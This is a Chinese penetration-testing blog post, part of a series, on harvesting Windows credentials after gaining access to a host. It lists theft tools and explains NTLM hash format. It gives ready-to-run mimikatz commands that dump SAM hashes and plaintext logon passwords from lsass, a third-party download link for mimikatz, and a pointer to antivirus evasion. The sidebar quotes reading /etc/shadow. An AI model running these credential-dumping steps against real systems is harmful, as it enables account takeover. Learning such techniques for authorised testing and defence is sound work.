内网渗透之内网信息收集(五)

已于 2022-09-14 19:53:03 修改
阅读量1.2k 收藏 29
点赞数 31
分类专栏: # 内网渗透 网络安全 文章标签: 安全 windows
于 2022-07-06 06:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63127854/article/details/125627076
版权

前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

凭证信息收集

01凭证获取工具

02密码hash

03mimikatz

04get-hashs

内网渗透之内网信息收集(六)_不知名白帽的博客-CSDN博客

凭证信息收集

01凭证获取工具

常用来获取windows密码的工具

  1. mimikatz
  2. wce
  3. pwddump7
  4. ophcrack
  5. procdump+mimikatz
  6. lazagne

02密码hash

LM哈希&NTLM型哈希

winodws hash:

2000

xp

2003

Vista

win7

2008

2012

LM

NTLM

windows本地hash:

http://www.secpulse.com/archives/65256.html

windows系统下hash密码格式:

用户名称:RID:LM-HASH值:NT-HASH值

03mimikatz

mimikatz下载:

链接:https://pan.baidu.com/s/1ZbQM5YrgNyqmHFWBySSJjg

提取码:jryu

非本地交互式凭证获取

mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords" "exit"

一般都是通过远程登陆靶机,在靶机内下载mimikatz

log result.txt(将结果传到txt中)

privilege::debug(提权)

token::elevate(模拟令牌:用于将权限提升为SYSTEM (默认)或在框中找到域管理员令牌)

获取到system用户的token

lsadump::sam(获得用户哈希)

sekurlsa::logonpasswords(获取明文密码)

mimikatz1.x版本:

privilege::debug //提升权限

inject::process lsass.exe sekurlsa.dll //注入sekurlsa.dll到lsass.exe进程里

@getLogonPasswords //获取密码

mimikatz免杀:

https://www.freebuf.com/articles/system/234365.html

04get-hashs

不知名白帽
关注
  • 31
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 35
    评论
专栏目录
内网信息收集
qq_40327508的博客
12-06 204
本机信息收集 1.查询账户信息: 对当前主机的用户角色和用户权限做了解,判断是否需要进一步提升权限。 win:whoami、net user 用户名 linux:whoami、id、cat /etc/shadow、cat /etc/passwd 2.查询网络和端口信息 根据目的主机的IP地址/网络连接/相关网络地址,确认所连接的网络情况。 win:ipconfig、netstat -ano ARP表:arp -a 路由表: route print
使用mimikatz获取windows密码凭证
cuteyann的博客
05-17 1477
(如果出现以下报错:ERROR kuhl_m_privilege_simple;RtlAdjustPrivilege (20) c0000061 说明你不是管理员权限)下载地址:https://github.com/gentilkiwi/mimikatz/releases。1、开启mimikatz。工具:mimikatz。
mimikatz使用
qq_18811919的博客
02-25 413
mimikatz常规模块使用说明
深入了解脚本小子专区,深入探讨如何在Windows上获取系统外壳
weixin_26636643的博客
09-25 141
Gather around, neighbors! It is time for a short pentest adventure story.In a recent engagement, we found ourselves having issues to get a command prompt under nt authority\system context, even if we ...
CTF-综合测试(高难度)【超详细】
不知名白帽的博客
09-09 1万+
CTF-综合测试(高难度)【超详细】
内网渗透之域渗透.pdf
08-07
内网渗透和域渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...
内网渗透思路.pdf
最新发布
04-22
在进行内网渗透之前,第一步是要充分收集目标服务器的信息。这一步骤至关重要,因为它可以帮助我们了解目标网络的基本结构,从而更有效地定位可能的安全漏洞。 **方法与工具:** - **F-NAScan**:这是一个开源工具...
【渗透资源】 内网渗透指南
03-03
在进行内网渗透之前,信息收集是至关重要的一个步骤。信息收集分为多个阶段,首先是主机发现,目标是识别内网中存活的主机IP地址。这可以通过运行端口扫描和漏洞扫描工具来实现,比如使用nmap、masscan等工具来获取...
信息收集内网结构的探测.pdf
04-08
### 信息收集内网结构的探测 在网络安全领域中,对于内部网络的了解与掌握是进行安全评估或攻击渗透的基础工作。本文将基于提供的部分文件内容,深入探讨如何有效地进行内网结构探测,并通过实际案例解析关键技术...
[ 内网渗透 ] 内网端口扫描.zip
02-11
内网渗透是网络安全领域中的一个重要话题,特别是在企业网络环境中,内网安全性直接影响到公司的核心数据和业务运行。端口扫描是内网渗透的第一步,它可以帮助安全专家或红队成员发现网络上的开放服务,从而识别...
mimikatz最新版本
11-20
mimikatz最新版本 嗅探hash
DC-1靶机练习【超详细】
不知名白帽的博客
09-07 1万+
DC-1靶机练习【超详细】
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 1955
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows ...
Mimikatz Windows、Linux基本使用
weixin_51741741的博客
12-02 5831
一款密码抓取抓取神器,除了抓取密码之外,听说还可以导出谷歌浏览器的密码,当然第二种我也不会。
mimikatz基础
rnn0921的博客
08-23 406
安装流程(mimikatz在Windows上使用老出错,所以我在linux上连接本机使用的)使用详情:用msfvenom控制本机加载mimkatzload kiwi查看命令查看当前目录查看当前目录下的内容尝试下载666.png下载成功!
密码安全攻防技术精讲
GitChat
07-03 3035
课程介绍 本课程内容将以作者亲身经历的事情为主,从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响,将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例,背后都有真实故事和场景,以技术的方式来再现和还原。 非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击,从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限,密码攻防涉及的技术非常...
从mimikatz学习Windows安全之访问控制模型(一)
ZAWX_NETSTARSEC的博客
08-19 577
从mimikatz学习Windows安全之访问控制模型(一) 从mimikatz学习Windows安全之访问控制模型(一)0x00 前言0x01 访问控制模型简介1. 访问令牌(Access Token)2. 安全描述符(Security Descriptor)3. 权限检查的过程0x02 Mimikatz的Token模块1. token::whoami2. token::list3. token::elevate4. token::run5. token::revert0x03 令牌窃取1. 原理2.
史上最强内网渗透知识点总结
热门推荐
3569
06-02 3万+
https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247487491&idx=1&sn=270336c6cca79b4a4e5d777d41ce71b7&chksm=ec1e202bdb69a93dba0f48f973132958c95d86b2db2b6d70b8ddd1cbe41c187fa08ca4c...
内网渗透梳理
Grey的博客
07-03 1209
信息收集命令:query user || qwinsta 查看当前在线用户net user  查看本机用户net user /domain 查看域用户net view & net group "domain computers" /domain 查看当前域计算机列表 第二个查的更多net view /domain 查看有几个域net view \\\\dc   查看 dc 域内共享文件ne...
内网渗透实战:信息收集与常用工具解析
内网渗透流程与思路和工具讲解是一门深入研究的信息安全技术,它关注的是如何通过合法或非法手段评估内部网络的安全状况,以发现潜在漏洞。以下是关于内网渗透的核心知识点: 1. **内网渗透流程**: - **阶段一:...
评论 35
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不知名白帽

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值